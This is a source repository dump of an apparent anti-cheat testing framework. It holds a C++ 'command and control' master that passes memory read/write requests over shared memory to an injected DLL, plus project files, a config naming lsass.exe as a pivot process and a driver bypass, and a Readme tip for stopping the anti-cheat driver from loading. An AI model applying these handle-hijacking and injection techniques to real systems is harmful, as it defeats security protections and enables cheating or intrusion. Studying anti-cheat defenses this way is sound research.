22 | 15.0 23 | {09373BE0-A33D-4D50-8148-E9DF5EF1ABCE} 24 | Win32Proj 25 | StealthHijackingNormalDLL 26 | 10.0.17763.0 27 | 28 | 29 | 30 | DynamicLibrary 31 | true 32 | v141 33 | Unicode 34 | 35 | 36 | DynamicLibrary 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | DynamicLibrary 44 | true 45 | v141 46 | Unicode 47 | 48 | 49 
| DynamicLibrary 50 | false 51 | v141 52 | true 53 | MultiByte 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | NotUsing 88 | Level3 89 | Disabled 90 | true 91 | _DEBUG;STEALTHHIJACKINGNORMALDLL_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 92 | true 93 | $(SolutionDir)CheatHelper;%(AdditionalIncludeDirectories) 94 | 95 | 96 | Windows 97 | true 98 | $(VCInstallDir)lib;%(AdditionalLibraryDirectories);C:\Program Files (x86)\Microsoft Visual Studio\2017\Community\VC\Tools\MSVC\14.16.27023\lib\onecore\x64 99 | 100 | 101 | 102 | 103 | Use 104 | Level3 105 | Disabled 106 | true 107 | WIN32;_DEBUG;STEALTHHIJACKINGNORMALDLL_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 108 | true 109 | $(SolutionDir)CheatHelper;%(AdditionalIncludeDirectories) 110 | 111 | 112 | Windows 113 | true 114 | 115 | 116 | 117 | 118 | Use 119 | Level3 120 | MaxSpeed 121 | true 122 | true 123 | true 124 | WIN32;NDEBUG;STEALTHHIJACKINGNORMALDLL_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 125 | true 126 | 127 | 128 | Windows 129 | true 130 | true 131 | true 132 | 133 | 134 | 135 | 136 | NotUsing 137 | Level3 138 | MaxSpeed 139 | true 140 | true 141 | true 142 | _CRT_SECURE_NO_WARNINGS;NDEBUG;STEALTHHIJACKINGNORMALDLL_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 143 | true 144 | $(SolutionDir)CheatHelper;%(AdditionalIncludeDirectories) 145 | 146 | 147 | Windows 148 | true 149 | true 150 | true 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | Create 160 | Create 161 | Create 162 | Create 163 | 164 | 165 | 166 | 167 | 168 | {a080c117-d1db-4671-8217-65496573ba4d} 169 | 170 | 171 | 172 | 173 | 174 | 175 | 176 | 177 | -------------------------------------------------------------------------------- /StealthHijackingNormalDLL/StealthHijackingNormalDLL.vcxproj.filters: 
-------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | Header Files 23 | 24 | 25 | 26 | 27 | Source Files 28 | 29 | 30 | Source Files 31 | 32 | 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /StealthHijackingNormalDLL/stdafx.cpp: -------------------------------------------------------------------------------- 1 | #include "stdafx.h" 2 | -------------------------------------------------------------------------------- /StealthHijackingNormalDLL/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 11 | // Windows Header Files 12 | #include 13 | 14 | 15 | 16 | // reference additional headers your program requires here 17 | -------------------------------------------------------------------------------- /StealthHijackingNormalDLL/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 
7 | 8 | #include 9 | -------------------------------------------------------------------------------- /StealthHijackingNormalMaster/Readme.md: -------------------------------------------------------------------------------- 1 | # StealthHandleHijackingMaster 2 | 3 | ## Introduction 4 | 5 | 6 | ## Usage 7 | 8 | This module is used in combination with **StealthHandleHijackingDLL**. This is the "command and control" implementation. It has to be executed before injecting the DLL. 9 | 10 | HandleHijackingMaster will create a FileMapping (Shared Memory) that this module uses to receive instructions and then return information to the master (where all the bot logic should be located). 11 | 12 | ## Configuration 13 | 14 | This module requires configuration: 15 | 16 | - The following variables in config.ini need to be provided: 17 | 18 | [Addresses] 19 | ``` 20 | RPMAddressHigh=0x1 21 | RPMAddressLow=0x58A60000 22 | RPMAddress=0x0 23 | WPMAddressHigh=0x00000000 24 | WPMAddressLow=0x58A60000 25 | WPMAddress=0x0 26 | ntRVMAddressHigh=0x00000000 27 | ntRVMAddressLow=0x58A60000 28 | ntRVMAddress=0x0 29 | ntWVMAddressHigh=0x00000000 30 | ntWVMAddressLow=0x58A60000 31 | ntWVMAddress=0x0 32 | ZwRVMAddressHigh=0x00000000 33 | ZwRVMAddressLow=0x58A60000 34 | ZwRVMAddress=0x0 35 | ZwWVMAddressHigh=0x00000000 36 | ZwWVMAddressLow=0x58A60000 37 | ZwWVMAddress=0x0 38 | ``` 39 | 40 | [Handles] 41 | 42 | ``` 43 | requestHandleFM=0x15FC 44 | ``` 45 | 46 | [Buffers] 47 | ``` 48 | #SIZE MUST BE SIZE+1 49 | RPMBuffer=TTTT1 50 | RPMBufferSize=0x6 51 | WPMBuffer=TTTT2 52 | WPMBufferSize=0x6 53 | ntRVMBuffer=TTTT4 54 | ntRVMBufferSize=0x6 55 | ntWVMBuffer=TTTT5 56 | ntWVMBufferSize=0x6 57 | ZwRVMBuffer=TTTT6 58 | ZwRVMBufferSize=0x6 59 | ZwWVMBuffer=TTTT7 60 | ZwWVMBufferSize=0x6 61 | ``` 62 | 63 | [Strings] 64 | ``` 65 | targetProc=BlackDesert64.exe 66 | privotProc=lsass.exe 67 | #Edit in DLL if you changed it here 68 | fileMapName=Global\StealthHijacking 69 | ``` 70 | 71 | ## Combination with other
techniques 72 | 73 | - **RUNASKINVOKER**: By executing the game using this options we will prevent the Anti-cheat to fully protect the game end load the driver. 74 | 75 | 76 | -------------------------------------------------------------------------------- /StealthHijackingNormalMaster/StealthHijackingNormalMaster.cpp: --------------------------------------------------------------------------------
// StealthHijackingNormalMaster.cpp : This file contains the 'main' function. Program execution begins and ends there.
//
// Master ("command and control") side of the file-mapping channel: it creates a
// named shared-memory section, writes seven requests (action 1..7) into it one
// at a time, and reads the response to each. Turn-taking with the other side is
// done through CheatHelper::checkSpinLockByte / setSpinLockByte on the view.

#include "pch.h"
#include  // header name lost in page extraction
#include "CheatHelper.h"
#include  // header name lost in page extraction

#pragma warning(disable:5040)
#define LOCK 1


std::string fileMapName = "";        // not read by any code in this file; Init() uses CheatHelper::fileMapName
HANDLE hFileMap = NULL;              // section handle from CreateFileMappingA
HANDLE hTargetProcess = NULL;        // not used in this file
HANDLE hExplorerProcess = NULL;      // not used in this file
LPVOID pFileMapMem = NULL;           // base address of the mapped view
SIZE_T fileMapSize = FILEMAPSIZE;    // FILEMAPSIZE is defined outside this file (presumably CheatHelper.h)


PipeMessageRequest PMRequest;        // request written into the view by WriteFileMapping()
PipeMessageResponse PMResponse;      // response copied out of the view by ReadFileMapping()

// Copies sizeof(PipeMessageResponse) bytes from the start of the view into
// PMResponse and prints whether PMResponse.status is 0.
// Returns: always 1, so the caller's "Failed reading" branch is never taken.
// The response bytes are used as-is; nothing here validates them.
int ReadFileMapping()
{
    CopyMemory(&PMResponse, (void*)(pFileMapMem), sizeof(PipeMessageResponse));
    if (PMResponse.status == 0)
    {
        std::cout << "\t[+] Status: Successful" << std::endl;
    }
    else
    {
        std::cout << "\t[-] Status: Unsuccessful" << std::endl;
    }
    //std::cout << "\t[+] bytesRead: " << PMResponse.bytesRead << std::endl;
    //std::cout << "\t[+] buffer: ";
    //CheatHelper::PrintBytes((PVOID)PMResponse.buffer, (SIZE_T)PMResponse.bytesRead);
    return 1;
}


// Clears the view, logs the fields of PMRequest and copies PMRequest to the
// start of the view.
// Returns: always true (1), so the caller's "Failed writing" branch is never taken.
int WriteFileMapping()
{
    // Zeroes FILEMAPSIZE - 1 bytes from the start of the view.
    // NOTE(review): where the spin-lock byte sits relative to this range is not
    // visible in this file; confirm against CheatHelper.
    SecureZeroMemory(pFileMapMem, FILEMAPSIZE - 1);
    std::cout << "[+] Sending Msg: " << std::endl;
    std::cout << "\t[+] action: " << PMRequest.action << std::endl;
    std::cout << "\t[+] handle: 0x" << PMRequest.handle << std::endl;
    // std::hex stays set on std::cout, so `size` below and `action` on later
    // calls are printed in hexadecimal without a prefix.
    std::cout << "\t[+] address: 0x" << std::hex << PMRequest.address << std::endl;
    std::cout << "\t[+] size: " << PMRequest.size << std::endl;
    std::cout << "\t[+] buffer: ";
    CheatHelper::PrintBytes((PVOID)PMRequest.buffer, (SIZE_T)PMRequest.size);
    CopyMemory((void*)(pFileMapMem), &PMRequest, sizeof(PipeMessageRequest));
    return true;
}


// Loads the configuration, creates the named section and maps a view of it.
// Returns: 0 (false) on SUCCESS and 1 (true) on failure. This is the inverse of
// the usual bool convention; main() relies on it by testing `!Init()`.
bool Init()
{
    CheatHelper::loadConfig();

    //fileMapName = "Global\\StealthHijacking";
    // Section backed by the paging file (INVALID_HANDLE_VALUE) and named by
    // CheatHelper::fileMapName; config.ini lists fileMapName=Global\StealthHijacking.
    // The security attributes are NULL, so the object gets the default security
    // descriptor. The channel is therefore neither private nor authenticated: any
    // process the default DACL admits can open the name and read or alter the
    // request/response bytes.
    hFileMap = CreateFileMappingA(INVALID_HANDLE_VALUE, NULL, PAGE_READWRITE | SEC_COMMIT | SEC_NOCACHE, 0, (DWORD)fileMapSize, CheatHelper::fileMapName);
    if (!hFileMap)
    {
        std::cout << "[-] CreateFileMappingA failed: " << std::dec << GetLastError() << std::endl;
        return 1;
    }
    std::cout << "[+] CreateFileMappingA." << std::endl;
    pFileMapMem = MapViewOfFile(hFileMap, FILE_MAP_ALL_ACCESS, 0, 0, fileMapSize);
    if (!pFileMapMem)
    {
        // hFileMap is left open on this path.
        std::cout << "[-] MapViewOfFile failed: " << std::dec << GetLastError() << std::endl;
        return 1;
    }
    std::cout << "[+] MapViewOfFile." << std::endl;

    // Presumably waits until the lock byte in the view reaches LOCK, i.e. until
    // the other side has attached (helper not shown; confirm).
    CheatHelper::checkSpinLockByte(pFileMapMem, LOCK);

    return 0;
}





// Entry point: initialises the channel, sends the requests with action 1
// through 7 and reads one response per request, then releases the section and
// sleeps.
int main()
{
    std::cout << "[+] Init\n";


    // Init() returns 0 on success, so this branch is the success path.
    if (!Init())
    {

        //PMRequest.action = 1;
        //PMRequest.handle = (HANDLE)0xC32;
        //PMRequest.address = 0x0000000144BC6000;
        //strncpy_s(PMRequest.buffer, "ABCD3", BUFSIZE);
        //PMRequest.size = sizeof(PMRequest.buffer);

        // NOTE(review): this reads requestHandleNP, while this module's Readme
        // lists requestHandleFM under [Handles]; confirm which key is intended.
        PMRequest.handle = CheatHelper::requestHandleNP;
        PMRequest.address = 0x0;
        SecureZeroMemory(PMRequest.buffer, BUFSIZE-1);
        PMRequest.size = 0x0;


        int i = 1;
        while (1)
        {
            PMRequest.action = i;

            // Helper not shown; presumably fills address/buffer/size for this
            // action from the loaded configuration.
            CheatHelper::prepareRequest(PMRequest);

            // Wait for our turn, publish the request, then hand the view over.
            CheatHelper::checkSpinLockByte(pFileMapMem, LOCK);

            if (!WriteFileMapping())
            {
                std::cout << "[-] Failed writing." << std::endl;
            }


            CheatHelper::setSpinLockByte(pFileMapMem, !LOCK);
            // Wait again until the other side has written its response.
            CheatHelper::checkSpinLockByte(pFileMapMem, LOCK);

            if (!ReadFileMapping())
            {
                std::cout << "[-] Failed reading." << std::endl;
            }

            // Action 7 is the last request; the DLL side leaves its loop on it too.
            if (i == 7)
                break;
            i++;
        }
        CloseHandle(hFileMap);
        UnmapViewOfFile(pFileMapMem);
    }
    // Runs whether or not Init() succeeded: 1,000,000 ms, roughly 16.7 minutes.
    Sleep(1000000);
}

// Run program: Ctrl + F5 or Debug > Start Without Debugging menu
// Debug program: F5 or Debug > Start Debugging menu

// Tips for Getting Started:
// 1. Use the Solution Explorer window to add/manage files
// 2. Use the Team Explorer window to connect to source control
// 3. Use the Output window to see build output and other messages
// 4. Use the Error List window to view errors
// 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project
// 6.
In the future, to open this project again, go to File > Open > Project and select the .sln file 149 | -------------------------------------------------------------------------------- /StealthHijackingNormalMaster/StealthHijackingNormalMaster.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {F74258DB-52A4-4B60-8FBE-385091D35DCA} 24 | Win32Proj 25 | StealthHijackingNormalMaster 26 | 10.0.17763.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v141 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v141 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v141 52 | true 53 | MultiByte 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | NotUsing 88 | Level3 89 | Disabled 90 | true 91 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | true 93 | pch.h 94 | $(SolutionDir)CheatHelper;%(AdditionalIncludeDirectories) 95 | 96 | 97 | Console 98 | true 99 | C:\Program Files (x86)\Microsoft Visual Studio\2017\Community\VC\Tools\MSVC\14.16.27023\lib\onecore\x64 100 | 101 | 102 | 103 | 104 | Use 105 | Level3 106 | Disabled 107 | true 108 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 109 | true 110 | pch.h 111 | $(SolutionDir)CheatHelper;%(AdditionalIncludeDirectories) 112 | 113 | 114 | Console 115 | true 116 | 117 | 118 | 119 | 120 | Use 121 | Level3 122 | MaxSpeed 123 | true 124 | true 125 | true 126 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 127 | true 128 | pch.h 129 | 130 | 131 | Console 132 | true 133 | true 134 | true 135 | 136 | 137 | 138 | 139 | NotUsing 140 | Level3 141 | MaxSpeed 142 | true 143 | true 144 | true 145 | 
_CRT_SECURE_NO_WARNINGS;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 146 | true 147 | pch.h 148 | $(SolutionDir)CheatHelper;%(AdditionalIncludeDirectories) 149 | 150 | 151 | Console 152 | true 153 | true 154 | true 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | Create 163 | Create 164 | Create 165 | Create 166 | 167 | 168 | 169 | 170 | 171 | {a080c117-d1db-4671-8217-65496573ba4d} 172 | 173 | 174 | 175 | 176 | 177 | 178 | 179 | 180 | -------------------------------------------------------------------------------- /StealthHijackingNormalMaster/StealthHijackingNormalMaster.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | 23 | 24 | Source Files 25 | 26 | 27 | Source Files 28 | 29 | 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /StealthHijackingNormalMaster/pch.cpp: -------------------------------------------------------------------------------- 1 | // pch.cpp: source file corresponding to pre-compiled header; necessary for compilation to succeed 2 | 3 | #include "pch.h" 4 | 5 | // In general, ignore this file, but keep it around if you are using pre-compiled headers. 6 | -------------------------------------------------------------------------------- /StealthHijackingNormalMaster/pch.h: -------------------------------------------------------------------------------- 1 | // Tips for Getting Started: 2 | // 1. Use the Solution Explorer window to add/manage files 3 | // 2. Use the Team Explorer window to connect to source control 4 | // 3. 
Use the Output window to see build output and other messages 5 | // 4. Use the Error List window to view errors 6 | // 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project 7 | // 6. In the future, to open this project again, go to File > Open > Project and select the .sln file 8 | 9 | #ifndef PCH_H 10 | #define PCH_H 11 | 12 | // TODO: add headers that you want to pre-compile here 13 | 14 | #endif //PCH_H 15 | -------------------------------------------------------------------------------- /config.ini: -------------------------------------------------------------------------------- 1 | [States] 2 | bDelayExecution=0 3 | [Addresses] 4 | RPMAddressHigh=0x1 5 | RPMAddressLow=0x58A60000 6 | RPMAddress=0x0 7 | WPMAddressHigh=0x00000000 8 | WPMAddressLow=0x58A60000 9 | WPMAddress=0x0 10 | ntRVMAddressHigh=0x00000000 11 | ntRVMAddressLow=0x58A60000 12 | ntRVMAddress=0x0 13 | ntWVMAddressHigh=0x00000000 14 | ntWVMAddressLow=0x58A60000 15 | ntWVMAddress=0x0 16 | ZwRVMAddressHigh=0x00000000 17 | ZwRVMAddressLow=0x58A60000 18 | ZwRVMAddress=0x0 19 | ZwWVMAddressHigh=0x00000000 20 | ZwWVMAddressLow=0x58A60000 21 | ZwWVMAddress=0x0 22 | startAddressPhyHigh=0x00000000 23 | startAddressPhyLow=0x58A60000 24 | startAddressPhy=0x0 25 | [Handles] 26 | requestHandleNP=0x15FC 27 | requestHandleFM=0x15FC 28 | requestHandleDrv=0x15FC 29 | [Buffers] 30 | #SIZE MUST BE SIZE+1 31 | RPMBuffer=TTTT1 32 | RPMBufferSize=0x6 33 | WPMBuffer=TTTT2 34 | WPMBufferSize=0x6 35 | ntRVMBuffer=TTTT4 36 | ntRVMBufferSize=0x6 37 | ntWVMBuffer=TTTT5 38 | ntWVMBufferSize=0x6 39 | ZwRVMBuffer=TTTT6 40 | ZwRVMBufferSize=0x6 41 | ZwWVMBuffer=TTTT7 42 | ZwWVMBufferSize=0x6 43 | [Strings] 44 | targetProc=BD64.exe 45 | privotProc=lsass.exe 46 | #Edit in DLL if you changed it here 47 | namedPipeName=\\.\\pipe\\driverbypass 48 | #Edit in DLL if you changed it here 49 | fileMapName=Global\StealthHijacking 50 | driverName=\\.\GIO 
-------------------------------------------------------------------------------- /resources/MinHook/include/MinHook.h: -------------------------------------------------------------------------------- 1 | /* 2 | * MinHook - The Minimalistic API Hooking Library for x64/x86 3 | * Copyright (C) 2009-2017 Tsuda Kageyu. 4 | * All rights reserved. 5 | * 6 | * Redistribution and use in source and binary forms, with or without 7 | * modification, are permitted provided that the following conditions 8 | * are met: 9 | * 10 | * 1. Redistributions of source code must retain the above copyright 11 | * notice, this list of conditions and the following disclaimer. 12 | * 2. Redistributions in binary form must reproduce the above copyright 13 | * notice, this list of conditions and the following disclaimer in the 14 | * documentation and/or other materials provided with the distribution. 15 | * 16 | * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 17 | * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED 18 | * TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A 19 | * PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER 20 | * OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 21 | * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 22 | * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR 23 | * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF 24 | * LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING 25 | * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 26 | * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 27 | */ 28 | 29 | #pragma once 30 | 31 | #if !(defined _M_IX86) && !(defined _M_X64) && !(defined __i386__) && !(defined __x86_64__) 32 | #error MinHook supports only x86 and x64 systems. 33 | #endif 34 | 35 | #include 36 | 37 | // MinHook Error Codes. 
38 | typedef enum MH_STATUS 39 | { 40 | // Unknown error. Should not be returned. 41 | MH_UNKNOWN = -1, 42 | 43 | // Successful. 44 | MH_OK = 0, 45 | 46 | // MinHook is already initialized. 47 | MH_ERROR_ALREADY_INITIALIZED, 48 | 49 | // MinHook is not initialized yet, or already uninitialized. 50 | MH_ERROR_NOT_INITIALIZED, 51 | 52 | // The hook for the specified target function is already created. 53 | MH_ERROR_ALREADY_CREATED, 54 | 55 | // The hook for the specified target function is not created yet. 56 | MH_ERROR_NOT_CREATED, 57 | 58 | // The hook for the specified target function is already enabled. 59 | MH_ERROR_ENABLED, 60 | 61 | // The hook for the specified target function is not enabled yet, or already 62 | // disabled. 63 | MH_ERROR_DISABLED, 64 | 65 | // The specified pointer is invalid. It points the address of non-allocated 66 | // and/or non-executable region. 67 | MH_ERROR_NOT_EXECUTABLE, 68 | 69 | // The specified target function cannot be hooked. 70 | MH_ERROR_UNSUPPORTED_FUNCTION, 71 | 72 | // Failed to allocate memory. 73 | MH_ERROR_MEMORY_ALLOC, 74 | 75 | // Failed to change the memory protection. 76 | MH_ERROR_MEMORY_PROTECT, 77 | 78 | // The specified module is not loaded. 79 | MH_ERROR_MODULE_NOT_FOUND, 80 | 81 | // The specified function is not found. 82 | MH_ERROR_FUNCTION_NOT_FOUND 83 | } 84 | MH_STATUS; 85 | 86 | // Can be passed as a parameter to MH_EnableHook, MH_DisableHook, 87 | // MH_QueueEnableHook or MH_QueueDisableHook. 88 | #define MH_ALL_HOOKS NULL 89 | 90 | #ifdef __cplusplus 91 | extern "C" { 92 | #endif 93 | 94 | // Initialize the MinHook library. You must call this function EXACTLY ONCE 95 | // at the beginning of your program. 96 | MH_STATUS WINAPI MH_Initialize(VOID); 97 | 98 | // Uninitialize the MinHook library. You must call this function EXACTLY 99 | // ONCE at the end of your program. 100 | MH_STATUS WINAPI MH_Uninitialize(VOID); 101 | 102 | // Creates a Hook for the specified target function, in disabled state. 
103 | // Parameters: 104 | // pTarget [in] A pointer to the target function, which will be 105 | // overridden by the detour function. 106 | // pDetour [in] A pointer to the detour function, which will override 107 | // the target function. 108 | // ppOriginal [out] A pointer to the trampoline function, which will be 109 | // used to call the original target function. 110 | // This parameter can be NULL. 111 | MH_STATUS WINAPI MH_CreateHook(LPVOID pTarget, LPVOID pDetour, LPVOID *ppOriginal); 112 | 113 | // Creates a Hook for the specified API function, in disabled state. 114 | // Parameters: 115 | // pszModule [in] A pointer to the loaded module name which contains the 116 | // target function. 117 | // pszTarget [in] A pointer to the target function name, which will be 118 | // overridden by the detour function. 119 | // pDetour [in] A pointer to the detour function, which will override 120 | // the target function. 121 | // ppOriginal [out] A pointer to the trampoline function, which will be 122 | // used to call the original target function. 123 | // This parameter can be NULL. 124 | MH_STATUS WINAPI MH_CreateHookApi( 125 | LPCWSTR pszModule, LPCSTR pszProcName, LPVOID pDetour, LPVOID *ppOriginal); 126 | 127 | // Creates a Hook for the specified API function, in disabled state. 128 | // Parameters: 129 | // pszModule [in] A pointer to the loaded module name which contains the 130 | // target function. 131 | // pszTarget [in] A pointer to the target function name, which will be 132 | // overridden by the detour function. 133 | // pDetour [in] A pointer to the detour function, which will override 134 | // the target function. 135 | // ppOriginal [out] A pointer to the trampoline function, which will be 136 | // used to call the original target function. 137 | // This parameter can be NULL. 138 | // ppTarget [out] A pointer to the target function, which will be used 139 | // with other functions. 140 | // This parameter can be NULL. 
141 | MH_STATUS WINAPI MH_CreateHookApiEx( 142 | LPCWSTR pszModule, LPCSTR pszProcName, LPVOID pDetour, LPVOID *ppOriginal, LPVOID *ppTarget); 143 | 144 | // Removes an already created hook. 145 | // Parameters: 146 | // pTarget [in] A pointer to the target function. 147 | MH_STATUS WINAPI MH_RemoveHook(LPVOID pTarget); 148 | 149 | // Enables an already created hook. 150 | // Parameters: 151 | // pTarget [in] A pointer to the target function. 152 | // If this parameter is MH_ALL_HOOKS, all created hooks are 153 | // enabled in one go. 154 | MH_STATUS WINAPI MH_EnableHook(LPVOID pTarget); 155 | 156 | // Disables an already created hook. 157 | // Parameters: 158 | // pTarget [in] A pointer to the target function. 159 | // If this parameter is MH_ALL_HOOKS, all created hooks are 160 | // disabled in one go. 161 | MH_STATUS WINAPI MH_DisableHook(LPVOID pTarget); 162 | 163 | // Queues to enable an already created hook. 164 | // Parameters: 165 | // pTarget [in] A pointer to the target function. 166 | // If this parameter is MH_ALL_HOOKS, all created hooks are 167 | // queued to be enabled. 168 | MH_STATUS WINAPI MH_QueueEnableHook(LPVOID pTarget); 169 | 170 | // Queues to disable an already created hook. 171 | // Parameters: 172 | // pTarget [in] A pointer to the target function. 173 | // If this parameter is MH_ALL_HOOKS, all created hooks are 174 | // queued to be disabled. 175 | MH_STATUS WINAPI MH_QueueDisableHook(LPVOID pTarget); 176 | 177 | // Applies all queued changes in one go. 178 | MH_STATUS WINAPI MH_ApplyQueued(VOID); 179 | 180 | // Translates the MH_STATUS to its name as a string. 
181 | const char * WINAPI MH_StatusToString(MH_STATUS status); 182 | 183 | #ifdef __cplusplus 184 | } 185 | #endif 186 | 187 | -------------------------------------------------------------------------------- /resources/MinHook/lib/libMinHook-x64-v141-mdd.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/niemand-sec/AntiCheat-Testing-Framework/e0c74d7fe99ea62a11adcfcd7dff4cdc50d6b8da/resources/MinHook/lib/libMinHook-x64-v141-mdd.lib --------------------------------------------------------------------------------